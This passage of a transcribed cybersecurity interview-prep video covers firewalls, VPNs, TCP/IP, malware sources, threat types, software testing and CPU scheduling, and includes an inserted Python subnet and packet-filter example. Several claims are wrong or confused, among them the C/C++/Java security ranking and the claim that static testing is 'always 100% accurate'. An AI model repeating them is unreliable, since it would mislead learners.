will come across, which analyze packets and let them pass through only if they match an established security rule set. Now here people do get confused: when we say that we analyze packets, people think that these firewalls will analyze the contents of that packet, which is not
correct. Where the definition for a packet filtering firewall says that these firewalls analyze packets, it means that they are only analyzing the source and destination IP addresses, port numbers and the protocols that are mentioned in those packets. These firewalls do not have the capability of deep packet inspection, or DPI as it is known; if that capability comes into the picture you're basically looking at an intrusion detection system or intrusion prevention system, in today's world called a next-gen firewall. So a packet filtering firewall essentially will only analyze data packets for their source and destination IP addresses, port numbers and the protocol that is being utilized. It will then map that information to the rules that are there on the firewall, and based on those rules it will either allow that connection to happen or disallow that connection from happening. The second type is a proxy firewall. These firewalls filter network traffic at the application level, so when you say application level they work at layer 7 of the OSI model. Packet filtering firewalls, since we have mentioned that they work on IP addressing and port numbers, will work on the network layer of the OSI model and also on the transport layer, because we also look at protocols. Proxy firewalls will work at layer 7, which is the application layer of the OSI model, and will deal with application-level protocols such as HTTP, HTTPS, FTP, SMTP and so on and so forth. And the third one is a stateful multi-layer inspection firewall. These filter packets at the network, transport and application layers, so they basically do the job of the first and the second types of firewalls; the packets are compared to known trusted packets. But now the first question is: if there is a stateful multi-layer inspection firewall, why do we have type 1 and type 2 firewalls like packet filtering and proxy firewalls? That is because that is how firewalls have evolved: we started off with packet filtering, then we added
functionality to it, and so on and so forth. So if a question comes, what is a firewall, you start off with the option saying it is hardware or software; this is the responsibility: the functionality of a firewall is to allow good traffic and disallow bad traffic based on the rules that have been configured on the firewall. And then you've got basically three types of firewalls, packet filtering, proxy and stateful multi-layer, and you just include a brief description of each of these firewalls. If getting your learning started is half the battle, what if you could do that for free? Visit SkillUp by Simplilearn; click on the link in the description to know more. Then moving on to question number five: what is a VPN? VPN stands for virtual private network. It is a connection between a VPN server and a VPN client, so it basically creates an encrypted tunnel between the client and the VPN server, which is then utilized to secure the connections that you are making with the internet. So as you can see in the diagram, the user has a VPN client installed on their machine. The VPN client then creates an encrypted tunnel to the VPN server, and through this tunnel encrypted data is transmitted, which can then be processed by the VPN server and sent to the internet. Information can be received back by the VPN server; the VPN server will encrypt that data and send it back to the user. So if there's a man-in-the-middle attack happening, or a hacker trying to eavesdrop on the communication mechanism, they will not be able to do so because of the encrypted tunnel. It is very difficult to decrypt this or hack through this encrypted tunnel; it is possible, but it is very difficult to achieve. Moving on to question number six: what are the advantages of distributed processing? Now before we go into the advantages of distributed processing we first have to understand what distributed processing is. It is a term which describes various computer systems that use more than one processor
to run an application. Here multiple computers across different locations share the same processor. The advantages of distributed processing are as follows, but before we go into the advantages: distributed computing is basically where multiple machines will pool their resources together to run a singular application, so an application that has multiple resources and can scale up and scale down as and when required. The advantages are that it can be very, very useful in data recovery, for example RAID, where you are striping data on various hard disks; it is reliable; it is cheaper, lower cost can be achieved; and it is easy to expand because of the scalability factor that we just talked about. If there is loss of data in one computer it can then be recovered by another interconnected computer, and one of the examples would be blockchain in today's world. What is blockchain? Data is created live and stored on a collection of computers, so if one of the computers goes offline the other computers in that network will still have that data, and the blockchain will still function without any issues. The second point: a glitch in one machine does not affect the processing, as there will be multiple other machines, like we discussed in the blockchain. Several cost-effective mini computers are used instead of a costly mainframe machine, so instead of having a server bank I can have multiple machines interconnected together and they can function in that particular blockchain or in that particular distributed processing mechanism. Depending on the amount of data processing, more computers can be attached to the network; thus you can increase the number of computers that can be a part of that blockchain, or you can reduce them as and when necessary. Moving on to question number seven: what is TCP/IP? TCP/IP, or Transmission Control Protocol over Internet Protocol, is a set of communication protocols that are used to interconnect networking devices on the internet. This protocol
defines how data should be transmitted over the internet by providing end-to-end communications. So essentially, if you want networking to be established on your machine you will need TCP/IP; without TCP/IP there will be no workgroups, there will be no domains, basically your interconnectivity will go for a toss. TCP/IP is software that, once installed on your machine, will then interact with the hardware, which is your network interface cards, and then your switches, wires, cables and all those, through protocols that have already been pre-configured in it. So within the TCP/IP suite of software you will have all the protocols, all the functionality of the OSI layers, and each and every protocol that works on each and every layer will be predefined and pre-configured to work in a particular manner. The Internet Protocol is all about routing each individual packet to make sure it reaches its destination. So with TCP you are talking about the protocols that will allow you to format the data and generate it so that you can communicate it over the network; IP will then deal with the routing of those packets so that the packet can be routed to the correct computer and be received by the recipient. So the TCP/IP model is the compressed version of the OSI model: the seven layers get converted into four layers, the network access layer, internet layer, transport layer and application layer. Going on to question 8: what do you mean by ipconfig and ifconfig? Both of these are commands, the first one on a Windows machine, the second one on a Linux machine. So ipconfig is known as Internet Protocol configuration. This is a command that is used on the command line interface of Microsoft Windows to view all the adapters and the configuration of each and every adapter for their network interfaces. So as you can see on the right-hand side in the command prompt screen, once you type in the ipconfig command at the command prompt and press enter, it will give you a list of all the adapters that are there, so you can
see wireless LAN adapter local area connection: the media is disconnected, it doesn't exist. At the bottom you will see the Wi-Fi connection, wireless LAN adapter, and it gives you the IP version 6 address, the IP version 4 address, the subnet mask and the default gateway. So this is the configuration that allows the machine to know what network it is on, what the default gateway for communicating to the internet is, what the subnet mask is, so how many computers may exist in that particular network, and what the IP address of that specific computer is, so that it can communicate across the network as well. ifconfig is the same thing on a Linux, Mac or Unix operating system, so the command will also give you the list of interfaces and the configuration of each and every interface. It is used to configure and control the TCP/IP network interface parameters from the command line interface, and it allows you to see the IP address of these network interfaces. So here you can see the wlp19s interface, the IP address being 192.168.43.215, the subnet mask being 255.255.255.0, with the broadcast being 192.168.43.255.
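The ifconfig values just described (192.168.43.215 with mask 255.255.255.0 and broadcast 192.168.43.255) are a good place to make three of the questions above concrete in code: the subnet mask and broadcast address of question 8, the unicast/multicast/broadcast classification of question 2, and the packet-filtering firewall of question 4, which consults only addresses, ports and protocol. The following Python is an added example written for this page, not code from the video or from Simplilearn; the rule set, the packets and their payloads are constructed for illustration and are not taken from any real firewall or capture.

```python
"""Subnet arithmetic, delivery-mode classification and a header-only packet filter.

Added example (not from the video). Reuses the interface values shown in the
ifconfig section: 192.168.43.215, mask 255.255.255.0, broadcast 192.168.43.255.
"""
import struct

MULTICAST_PREFIX = 0xE          # 224.0.0.0/4 (IGMP group addresses)
LIMITED_BROADCAST = 0xFFFFFFFF  # 255.255.255.255


def ip_to_int(ip):
    """Dotted-quad text -> 32-bit integer (validates each octet)."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError("bad IPv4 address: " + ip)
    return struct.unpack("!I", bytes(octets))[0]


def int_to_ip(n):
    return ".".join(str(b) for b in struct.pack("!I", n))


def mask_to_prefix(mask):
    """255.255.255.0 -> 24; rejects non-contiguous masks such as 255.0.255.0."""
    m = ip_to_int(mask)
    prefix = bin(m).count("1")
    if m != (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF:
        raise ValueError("non-contiguous mask: " + mask)
    return prefix


def subnet_info(ip, mask):
    """Network, directed broadcast and usable host count for ip/mask."""
    addr, m = ip_to_int(ip), ip_to_int(mask)
    prefix = mask_to_prefix(mask)
    network = addr & m
    broadcast = network | (~m & 0xFFFFFFFF)
    # /31 and /32 have no separate network/broadcast addresses to subtract.
    usable = 2 ** (32 - prefix) if prefix >= 31 else 2 ** (32 - prefix) - 2
    return {"prefix": prefix, "network": int_to_ip(network),
            "broadcast": int_to_ip(broadcast), "usable_hosts": usable}


def classify_destination(dst, local_ip, mask):
    """'broadcast' (limited or directed), 'multicast' (224/4) or 'unicast'."""
    d = ip_to_int(dst)
    if d == LIMITED_BROADCAST or dst == subnet_info(local_ip, mask)["broadcast"]:
        return "broadcast"
    if (d >> 28) == MULTICAST_PREFIX:
        return "multicast"
    return "unicast"


def in_cidr(ip, cidr):
    """True if ip falls inside 'a.b.c.d/n'; the keyword 'any' matches everything."""
    if cidr == "any":
        return True
    net, prefix = cidr.split("/")
    shift = 32 - int(prefix)
    return (ip_to_int(ip) >> shift) == (ip_to_int(net) >> shift)


def packet_filter(rules, pkt):
    """Stateless packet filter: first matching rule wins, default deny.

    Only the header fields src, dst, proto and dport are consulted. pkt['payload']
    is never read, which is exactly why a packet filter cannot see an attack
    carried in the application data (that needs DPI in an IDS/IPS or next-gen firewall).
    """
    for rule in rules:
        if (in_cidr(pkt["src"], rule["src"]) and in_cidr(pkt["dst"], rule["dst"])
                and rule["proto"] in ("any", pkt["proto"])
                and rule["dport"] in ("any", pkt["dport"])):
            return rule["action"]
    return "deny"


# Constructed rule set: LAN hosts may reach HTTPS anywhere, anyone may reach the
# internal web server on port 80, everything else is dropped.
RULES = [
    {"action": "allow", "src": "192.168.43.0/24", "dst": "any", "proto": "tcp", "dport": 443},
    {"action": "allow", "src": "any", "dst": "192.168.43.10/32", "proto": "tcp", "dport": 80},
    {"action": "deny", "src": "any", "dst": "any", "proto": "any", "dport": "any"},
]

# Constructed packets (documentation addresses, payloads are placeholders).
PACKETS = [
    {"src": "192.168.43.215", "dst": "198.51.100.7", "proto": "tcp", "dport": 443, "payload": b"TLS client hello"},
    {"src": "203.0.113.5", "dst": "192.168.43.10", "proto": "tcp", "dport": 80, "payload": b"<application data the filter never reads>"},
    {"src": "203.0.113.5", "dst": "192.168.43.10", "proto": "tcp", "dport": 22, "payload": b"SSH-2.0"},
    {"src": "192.168.43.215", "dst": "198.51.100.53", "proto": "udp", "dport": 53, "payload": b"dns query"},
]

if __name__ == "__main__":
    info = subnet_info("192.168.43.215", "255.255.255.0")
    print("network", info["network"], "broadcast", info["broadcast"], "usable hosts", info["usable_hosts"])
    for dst in ("192.168.43.1", "192.168.43.255", "224.0.0.251"):
        print(dst, "->", classify_destination(dst, "192.168.43.215", "255.255.255.0"))
    for pkt in PACKETS:
        print(pkt["src"], "->", pkt["dst"], pkt["proto"], pkt["dport"], "=", packet_filter(RULES, pkt))
```

Running the module prints the network and broadcast for the interface, classifies a few destinations, and shows that the second packet is allowed purely because its headers match rule 2, whatever its payload contains: the filter has no view of application data, which is why the video points to an IDS/IPS or next-gen firewall when deep packet inspection is needed.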
Question 9: what is the difference between a domain and a workgroup? This can be a very interesting question and can be a very lengthy question at the same time. A workgroup is nothing but a decentralized network where you have interconnected multiple machines together and each machine acts in its own individual capacity, thinks of itself as a server, right, so a decentralized network. Every user manages the resources individually on their PC, so local users on their own PCs manage the network shares: what can be shared from that particular machine, what data should be shared and should not be shared, with whom it can be shared, and so on and so forth. It is good if you've got a small network, a few machines altogether, and you want them to interact with minimal management effort. So each computer, each user, will decide what they want to allow other users to see on that particular network, and all of them would be connected over a LAN, a local area network, either a wireless or a wired one. If you look at your home Wi-Fi right now, that is one of the best examples of having a workgroup. The domain, on the other hand, is a centralized network model. So in a corporate environment, whenever you go there, you get a domain-based username and password which, when entered on a particular machine, gives you access to the entire network, or whatever applications and whatever resources have been allocated to you; that is where the domain comes in. It also uses a single sign-on mechanism for all the resources that are to be made available to you, whereas in a workgroup your local user is only meant for that particular computer. So coming back to the domain, it is an administrator who is going to manage the entire domain and all of the resources connected to the domain. The resources could be switches, routers, servers, data stores, applications, web servers, mail exchange servers and so on and so forth; all of these are administered by an administrator through the domain. It is the most
reliable and optimum solution for a large network where multiple users are going to interconnect and share data amongst each other. The computer can be connected to any network; that means you can be on the internet and, through the internet using a VPN, you can connect to your corporate network, authenticate and get access to whatever resources you are allowed to access, whereas in a workgroup you have to be a part of that network to access that particular network; if you change your location and go and connect to another Wi-Fi, you will lose access to your previous Wi-Fi. Then the last question for the networking section: what is data encapsulation in networking? Data encapsulation refers to the process of adding headers and trailers to the data. The data link layer binds each packet into a frame that contains the hardware address of the source and the destination computer. So in this example, when you're talking about data encapsulation, we have talked about how data that has been created by the application layer would have a header and a trailer that will give the various information of where that data needs to be sent. So the hardware address, which is the MAC address, comes into the picture and gets added to the header, and the IP addresses, port numbers and all of those things would then be added to these trailers as well, so that the data can then be routed to the intended recipient of that particular communication. With this we end the first 10 questions in networking, and in this video we are going to look at software and programming. So we're going to look at the first 10 questions, the first question being: how do you keep a computer secure? Now this is going to be a very generic question, so you want to put your best foot forward and you want to identify the most common methodologies on how you can keep a computer secure. So when we talk about computers, the first thing that you want to talk about is authentication mechanisms, where you want multi-factor authentication or
two-way authentication to ensure that your accounts are secured. Now if you look at using passwords, depending on how passwords are being stored by the application, password attacks can be possible, either a brute force attack or a dictionary-based attack, or even password guessing attacks are possible. To mitigate those kinds of attacks we need multi-factor authentication to ensure that accounts are kept secure. Now even if we are using multi-factor authentication we also want to look at secure passwords, which means that the password is complex enough to withstand most of the common attacks, and a brute force attack or a dictionary attack is just not possible. So we want to randomize our passwords; we want to create a complexity where a password meets standards such as: it has at least one lowercase and one uppercase character, has numerics and special characters, is randomized, is not based on a dictionary word, and doesn't contain usernames, email addresses, phone numbers or anything that is personal to that particular user. Third, keep regular updates, which means that there will be patches that will be released for the application, for the software that you are utilizing; download the patches and install them on a regular basis to ensure that you are secured against the most recent attacks that have been identified. Install a good antivirus; it could be your internet security suite, which will have an antivirus, an intrusion detection system and a firewall, and will help you protect yourself against ransomware, malware and any script-based attacks. Also have a specialized firewall on your system; it could be a host-based firewall or a network-based firewall, to ensure that attacks are kept at a minimum and you have your network definitions in place to allow or disallow connections from happening to your devices. Have anti-phishing software installed as well, to ensure that you are not getting any spam mails, and even if you do, you're able to identify that and not fall prey or victim to those spam mails. Phishing
attacks are generic, where they are directed towards individuals and they prey on the gullibility of that particular individual. So our Nigerian frauds, or the lotteries that we win on a regular basis of hundreds of millions of dollars, those messages, the emails that we receive, they are all phishing emails, where they're basically meant to victimize the user and then rob them of money, or install some malware, or do some other malicious activity. If you want to enhance the protection of data that you have stored on your devices, or that is accessed by your software or being transmitted by your software, use encryption: encrypt your data whether it is at rest, whether it is in motion or whether it is in use, thus reducing data leakage and data loss possibilities. And finally and foremost, secure your DNS. DNS is the domain name server which is utilized by computers to resolve domain names to IP addresses. If a DNS poisoning attack is possible, where your DNS settings have been modified by an attacker and you are redirected to a malicious DNS server, that server is going to redirect you to another malicious application which may have malware or malicious software as a payload. Also, you don't want people to know your DNS servers and the queries that you're making, so you want to use secure DNS, or DNS over HTTPS, to encrypt your DNS queries as well. So in a nutshell, if you follow these eight steps, your devices, your computers and your applications are going to be as secure as possible. The next question is: security-related aspects between C, C++ and Java. Now this is an open-ended question; it depends on which level you're giving an interview at, but you're looking at it from a fresher's perspective or a less experienced perspective, and thus these are some of the aspects that we want to look at, and the comparisons between C, C++ and Java. So the five aspects that we are looking at are pointers, code translations, storage allocation, inheritance and overall security
based on C, C++ and Java. So when we say pointers, we are looking at how we are using pointers and stacks and heaps to point to functions, how we exit those functions and how those functions are then recalled into the next function. C supports pointers and it is most secure; C++ also supports pointers but it is a little bit less secure than C; in Java it is not supported, direct access is given to memory allocation, and thus it is the least secure as far as pointers are concerned. When we look at code translations, C is able to compile but it is not secure, same with C++, but Java is an interpreted language and it is abstracted and secured. In storage allocation, in C we use malloc and calloc memory allocation, which is less secure because it does not have internal checks on verifying what memory is allocated and the user input that is being input to that memory; thus this can allow buffer overflow errors to creep in because of the non-verification of the input data, so it is the least secure. C++ uses the new and delete operators and is comparatively secure, but Java uses a garbage collector and thus is the most secure as far as storage allocation is concerned. When we talk about inheritance, the most secure is C++: C has no inheritance, so it's not secure; in C++ it is supported, thus it is the most secure; whereas in Java multiple inheritance is not supported and thus it is comparatively secure. Overall, the most secure out of all these, based on these five aspects, is Java; the least secure is C and the mid level is C++. Moving on to question 13: what are the different sources of malware? Now malware stands for malicious software, right; malware is basically software that poses as legitimate software but has a payload of a Trojan, virus, spyware, keylogger or some malicious software that is going to have a negative impact on the security of your particular device. So the
question here is what are the different sources of malware we want to identify the most common sources through which malware's in fact end user devices in today's world and you can start with pop-up ads so most of the websites if you're visiting untrusted sites if you're being redirected to sites that you don't know about there will be a lot of pop-ups coming your way where it says you're the one millionth visitor to this site please click here to download your gift or it will say uh congratulations on winning a particular product for visiting this page and so on so forth there are some instances where you can see a banner which is flashing at you on top of the page and says that there are eight uh infections that have been identified on your computer click here to download an anti-virus to clean the infections so all of these pop-ups are there as a social engineering attack as a phishing attack to make gullible people click on those links and download those malwares now the software that is posing as a security software itself can be a malicious software which is going to install a Trojan or a virus or a bot on your machine compromising the security of that machine the second is removable media USBS and humans have a fascination with USB so if you find a USB lying around it's a free USB you get excited about it and you want to take it home you want to plug it into a machine and see what's on the USB worst case scenario you format it and you've got a free USB to utilize higher the capacity the better but that is one of the most easiest way people use malware to uh to be deployed on unsuspecting users if there is a USB lying around why would why would somebody want to forget a USB it's most likely planted over there as a social engineering attack so that a gullible person is going to pick it up plug it into their device if the device is not secured enough it is going to install the malware right then documents and executable files this is where your viruses and all 
those Creeps in so let's say you're surfing on the internet you're looking for a software uh and you find the software on a particular website you do not verify the trustworthiness of that site and you just download and install that software now that software could be malware as well thus if you're surfing on the internet you're downloading files from different locations you have to research the website you have to research the source to ensure that it is trustworthy and only then are you going to download and execute those files thus internet downloads as well and when we say internet downloads it's not just untrustworthy sites we go to torrents we go to uh the dark web or the Deep Web and we are searching for other softwares especially those who are researching security right we always want if you're always on the lookout of new softwares and you're always on those forums which may not be so much trustworthy and we just download those files and start installing them that is a very bad scenario right so you have to be very careful what you are downloading from the internet your antiviruses your uh anti-fishing mechanisms you have hit intelligence mechanisms uh have those uh mechanisms installed and you want to verify where your downloads are coming from then your network connections if it is a P2P connection it is a local area network connection or a metropolitan area network you have to verify whom which devices are connected to your machines and you have to validate those connections before you want to trust those devices uh and before you connect to them if you're on a public Wi-Fi you probably don't want to connect to a public Wi-Fi in the first place then comes email attachments there are so many attachments that come across in today's world most of them in a zip format or a RAR format uh some of them come as document files where there are macros hidden within them macros are scripts that are recognized by Microsoft Office files right and then finally there 
are these malicious advertisements that we find online. Let it be Facebook, let it be WhatsApp, let it be any social media platform that you go to, or even your search engines: their job is to display ads; their job is not to verify whether the ad is legit or not. It is for us as consumers to be careful, validate that ad and verify whether it is a genuine ad or not. So just don't start clicking on any ad trusting the platform that you're on; be sure that you are investigating that ad. These are the most common sources of malware, and the end user will always get infected by one of these mechanisms.

Moving on to question 14: how does email work? Now this can be a complex question, but we have to keep it as simple as possible. We have to identify that there are two servers, both of them using SMTP, the Simple Mail Transfer Protocol. In this scenario John wants to send an email, so they've got an email client installed on their machine, which is connected to the mail exchange server, which has a DNS server that maps the routing, the exchange server and the inboxes. So when John composes that message and clicks on send, John should be connected to a mail exchange server where the email is sent through that particular person's inbox. John's inbox will then be validated, and that email will then be sent through the DNS server, through the internet, and will be received by the recipient's mail server. At this point in time John also requires the recipient's email address; in this case this is Jack, so jack@something.com would be the email address. While John is composing, the To field will have Jack's email address, the From field will have John's email address, the Subject field will have whatever they want to convey as a message, and the message body will have the message itself. Then when John clicks on send, it will go to the exchange server; the exchange server will then validate the inbox and identify where that inbox is located for Jack, and then through the internet the email will be sent to the mail server of Jack. The mail server will then identify the proper inbox that the email is to be sent to, and it will store that email in that particular inbox. When Jack opens their computer and accesses their inbox, this email from John will already be waiting for them, and they can respond to it the same way John had sent that email.

If getting your learning started is half the battle, what if you could do that for free? Visit SkillUp by Simplilearn; click on the link in the description to know more.

Moving on to question 15: what are the types of threats a company can face? This is where your threat modeling comes into the picture. So you're looking at software, you're looking at operating systems, and the company comes and asks you what are the threats that a company is most likely to face. On a broader scale, the threats that a company will always face would be classified as natural threats, man-made threats, technical threats and supply system threats.

A natural threat would be an act of God, which is outside the control of human beings: storms or any natural occurrences like volcanoes, thunderstorms, flooding, earthquakes, fire and so on. Anything that is natural. It depends on the geographic location that you're in and what kind of climate that area faces, and you need to identify the immediate threats and prepare for them. So if it is flooding that you're looking at, and you want to look at an office and the possibility of the office getting flooded is real, you probably want to take an office on a higher floor so that the threat of flooding is minimized. For fire we always have a fire drill where we practice our fire mechanism so that we can evacuate all humans as soon as possible and then worry about the technicalities of it. Under any circumstances, under any threat, humans will always have the first priority, and then everything else comes in.

Man-made threats are where man himself is the problem: strikes, lockouts, hackers, theft, war, rioting. All of those are man-made threats which we ourselves cannot be in control of, but we need to plan for them, and we need to have a business continuity plan or a disaster recovery plan for any of these threats that have been identified.

Then come the technical threats. Technical could be software bugs, operating system bugs, application bugs that come with the applications that we have, or a hardware failure where a server crashes or a hard disk crashes; maybe the processor stops working, the motherboard stops working, RAM gets corrupted. Any of the technical aspects stopping functioning, thus creating a break in the business, can come under technical. So anything to do with computers, let's say a server failing or a patch that is not installed on a particular piece of software, would come under technical threats.

And then the supply system. The supply system threats are your environmental threats, which depend on your supply chain failures. What is the supply chain for the office to function? There are a lot of dependencies that an office goes through; there are a lot of other vendors that support and provide critical and non-critical infrastructure for the office to function. First and foremost, electricity: without electricity nothing is going to be powered on and you're not going to be able to function. So if there is an electricity service provider and there is an electric outage, that comes under supply system; that's the supply chain failure where the vendor that provides electricity to you has failed in providing that particular service, and now you need a business continuity or a disaster recovery plan. So you probably have an inverter, or you already have a power generator plant that is going to generate your own power and supply it to your systems. There could be short circuits because of fluctuations in the electricity. Maybe the internet service provider fails and your internet crashes, so you have a backup line for the internet from a different vendor, and so on and so forth. Maybe your hardware vendors who are supplying you servers, desktops, laptops and whatnot fail because they are facing a strike or they go bankrupt, and suddenly you can no longer purchase hardware from your vendor because they are no longer in business; that's a supply chain failure. So any of these systems failing would also come under threats.

Under a broad category these are the first four threats that you need to identify, and then you can elaborate by providing more scenarios based on the experiences that you have had with each and every one of these threats. So a natural threat where you may have had experience, let's say flooding or any natural disaster which caused a problem for the continuity of your particular business: identify an example for each of these threats and provide that as an example in the interview.

What is black box and white box testing? When you are testing software or you're testing your infrastructure, there are two different tests that you can conduct: the first one is a black box, the second one is a white box. In a black box test there is no knowledge that is shared with the tester. So let's say you're an ethical hacker and you have been awarded a contract by an organization to test an application that they have developed. Now they are not going to give you any information; they are not going to tell you what the application is. They probably just give you an IP address and a port number where the application is hosted, and now you have to fire in your own queries and try to figure out what the application is, try to gather information, see what information can be gathered in the first place, and based on that you're going to figure out your way, identify vulnerabilities, and see if any of those vulnerabilities can lead to a security incident. So without any knowledge, zero knowledge of the IT infrastructure or the source code, that's a black box attack or a black box test. A white box test, on the other hand, is where full knowledge of the IT infrastructure or the source code is shared, so the ethical hacker has complete knowledge, and based on that knowledge they are then going to test the system to see if there are any flaws that they can identify. So why would these two audits be important? Because the first one, a black box audit, emulates the attack of an outsider, an external hacker sitting outside the organization trying to figure their way in, whereas a white box attack can emulate the attack of an insider: a disgruntled employee within that organization misusing their access controls or access rights to make unwarranted profits. So somebody who is corrupt, who has been bribed, who wants to sell out company secrets; they're going to try to find vulnerabilities, try to steal data and try to sell it on the grey market. So a white box would emulate an internal attack, and a black box would emulate an external attack.

Moving on to question 17: what is use case testing? Use case testing is a functional test, and it is also a black box test. What is a functional test? It tests the functionality of a particular piece of software once it has been created. Why is it a black box test? Because the user doesn't know what the functionality is; they just want to find out each and every scenario and see what that scenario generates as a response. They are not sure whether that is the appropriate response that should be generated or not; they're just trying to find out the response that is going to be generated after they fire off a query. So this technique is used by testers to get the test scenarios to exercise the whole system from start to finish.

Let's say it's a login mechanism for an application. Now the tester, since it's black box testing, will know that it is a login mechanism; they will not know the details of what login mechanisms are being utilized. So they wouldn't know whether input validation is done, whether output encoding is done, how the CGI calls are being made, how the queries are handled at the server side and how the database is going to treat that particular query. They have no idea whether SQL injection attacks are possible, and so on and so forth. So for them, with whatever input they are going to try to insert into that login mechanism, that's a functional black box test: the functionality being whether the login mechanism works, and, based on the type of inputs that are put in, whether it creates an unwarranted output, whether they can bypass the mechanism or hack into the system because of some of the flaws that were left behind.

Another example here is a piece of software made for users to use for documentation. The testers will test all the cases that the user can do: can the user view a document, can they add new documents, can they edit documents, and can they delete documents? This functionality will depend upon the access controls that have been granted to a particular user. For this particular user, the tester at this point in time would not know whether they are an administrative user or a regular user; they'll just try to do all of these and then write down the responses, saying I was able to view, I was able to add, I was able to edit and I was able to delete. The result will then be sent to a manager; the manager will look at the results and then, based on the actual access controls that were supposed to be there for this particular user, will try to identify whether this is an acceptable case or whether there were any flaws within this case.

Moving on to question 18: what is static and dynamic testing? This is again in application testing. Static testing is
done at an early stage of the development life cycle. Now there are multiple software development life cycles. What are these life cycles? There are different stages in which an application is created and provided to the customer. Your first stage would be determining the scope of the application, determining the hardware requirements for that application, then creating a flowchart and a functional chart for that application, and then maybe starting to code. Then an architect comes in, tests the code and verifies the code; then the testing phase comes in, then the security testing phase, and then user acceptance testing. But in every stage, at the very earliest stage, a static test will always be started to see whether whatever code has been developed, whatever scope has been developed, is going to be correct or not. This will include walkthroughs and code review. What is a walkthrough? A walkthrough is going through the documents that have been generated and trying to find faults in the documented journey that has been created so far. So let's say somebody has created a workflow or a flowchart for a program: how the functions are going to be called and how they're going to be executed. A walkthrough would be where all the responsible people walk through that particular flowchart, find any flaws within it and then rectify them. If there is any code that has already been written, this code will be reviewed manually and any flaws within that code will be identified. Static testing will always be 100% accurate in a very short amount of time, because it is immediate: you have created it and then the expert is going to test it to see whether everything is fine or not. It is all about a prevention mechanism: since you are doing it at the inception itself, if you find any flaw it gets immediately repaired. So this is about preventing vulnerabilities from creeping into that application at a later point in time.

Dynamic testing, on the other side, is done at the end of the development life cycle. You have generated the application, everything is ready, and now you want to do dynamic testing, which includes functional and non-functional testing. Functional testing is where the application itself is being tested, the functions, to see that all the parameters that are given to the application are functioning properly. Non-functional testing would be where security parameters, administrative parameters, all of them are being verified. This is where your test case scenarios come in, and you're going to test each and every scenario by generating inputs and analyzing the output that the application is going to give you. Dynamic testing is all about cure: here you're going to identify vulnerabilities, report them to the management, and the management is then going to figure out a way of patching those vulnerabilities so that they can be mitigated.

Moving on to the next question: what are the test levels in software testing? As far as software testing is concerned, there are four test levels: module testing, integration testing, system testing, and the final one, acceptance testing. In the testing phase of your development life cycle, the first thing is a module test: we are going to check your routines, your subroutines, your sub-programs and procedures that have been written in a program. So all your functions, all your mechanisms for that application are going to be tested. When you go into integration testing, the software may have been integrated with multiple other pieces of software; there may be different API calls coming in, maybe a third-party piece of software on which you depend to supply information. So all of these integrations of various pieces of software, various APIs, are tested to ensure that they are functioning properly and there are no flaws, errors or mistakes left behind in the integration of all of these. Then system testing is where the entire system, including the hardware and the software, is tested. It starts from the installation: now the software is complete, we know which hardware we are going to support it on, we start by installing the software and see whether the installation completes properly and whether there are any errors in the installation process itself. Then, once it is installed, the performance of that particular application: the write speeds, the read speeds on the hard disk, the transaction speeds that the application is capable of, the network dependencies that the application may have; all of those would come under system testing. And then acceptance testing, which is basically a quality assurance exercise that the application meets the client's requirements. The client in the first stage would have given the scope of what needs to be achieved; in acceptance testing you're verifying that that scope has been met and the client's requirements have been met, and you can assure the client about the functionality and the performance of that particular application.

Coming to the last question on software programs: what are the valuable steps to resolve issues while testing? In the previous scenarios, when we have started testing, if you execute a particular use case and then find a flaw, what would be the steps that you would utilize to address that particular flaw? The first step will always be record, then you're going to report it, and then you're going to introduce a control process for it. When we say record, you're going to create logs and you're going to try to resolve all the problems that have happened. Now when we say resolve, you're not going to recode the application, but you're going to test the system again and again to ensure that whatever is being recorded is accurate, and that all the logs, all the error mechanisms, all the dumps that have been generated due to this particular error are being captured so that they can be reported to the higher-level managers. The next step is, once you have accumulated all these logs and records, you're going to report them to the higher-level managers, who are then going to investigate it and go back to the developers to figure out the best way to mitigate those particular flaws. The report writing also needs to be accurate; it needs to be to the point; it needs to detail what the problem was; it will document all the steps that you took, all the inputs that you put in, and it will also record all the mechanisms that were utilized and the errors that were actually generated. That report will be given to the higher-level managers, who can then forward it to the developers, who based on those reports can start their troubleshooting. And then the control mechanism comes in: you're going to define the issue management process. This process needs to work in a particular manner where you are doing a test, you're recording whatever is happening, you're creating a report out of it, you're sending it to the management; the management will then take those reports, study them, and take them to the developers; the developers will test based on their criteria, they might interact with the testers at that point in time to identify particular flaws, and then we might want to recode that application or develop a patch which, once installed, will mitigate that particular flaw; and then it can come back to the testing phase again, where you can repeat those tests and validate that the flaw no longer exists. So these are the three steps that would be utilized for testing purposes, and that brings us to the first ten questions on the software platform.

In the next video we'll be looking at operating systems and applications. The first question is on virtual memory: what exactly is virtual memory? For a computer we have two types of memory. The first is the primary memory, which is your random
access memory, which is also known as volatile memory, and the secondary memory is your hard disk, where your data is stored permanently. But for a computer, when it has, let's say, 4 GB of memory or RAM, as in the scenario on your screen, it is going to replicate that and create another 4 GB of virtual memory on the hard disk, and it is going to use it in tandem with the RAM. So if the RAM is insufficient, the processor is going to utilize the 4 GB of virtual memory that is created on the hard disk, and it is going to swap data from the RAM to the hard disk. This is also known as a page file or a swap file.

The next question is: what are the different scheduling algorithms? The context for this question is a processor, and how processes are going to be fed to the processor and how the processor is going to treat these processes. The first is first come first serve: the process which requires the CPU first gets the CPU allocation first. Whenever there are processes being run by different applications, they make requests for some CPU time; in first come first serve, the first process that requests some processing time will get that much allocated to it, it will run through the process first, and then the next, and the next, and so on and so forth. The second one is shortest job first: this is where the shortest execution time for each process is calculated and that process is selected first for CPU scheduling. The third, priority scheduling, selects the task to work on as per priority: there would be some tasks that are marked with high priority, some would be normal and some would be low, so based on this high, normal or low priority all the processes will be classified; high priority will be dealt with first, then the normal, and finally the least priority. The fourth option is multilevel queues, where processes are assigned to a queue based on a specific property like process priority, the size of memory, etc. So they will be classified based on the attributes given to each particular process, multiple queues will be created, and then based on those attributes the processes will be processed by the CPU. Then shortest remaining time: the processor will be allocated to the task which is closest to its completion; or, look at it this way, the process that will take the least time to complete its processing would be chosen first. And then the round robin method, where each process in turn gets an equal share of time. So if there are ten processes, each process will be allocated a certain amount of time, after which the next process will be processed, and so on and so forth, and it will continue in a round robin fashion until all the processes get executed. So in short, six different scheduling algorithms, depending on how the operating system deals with it.

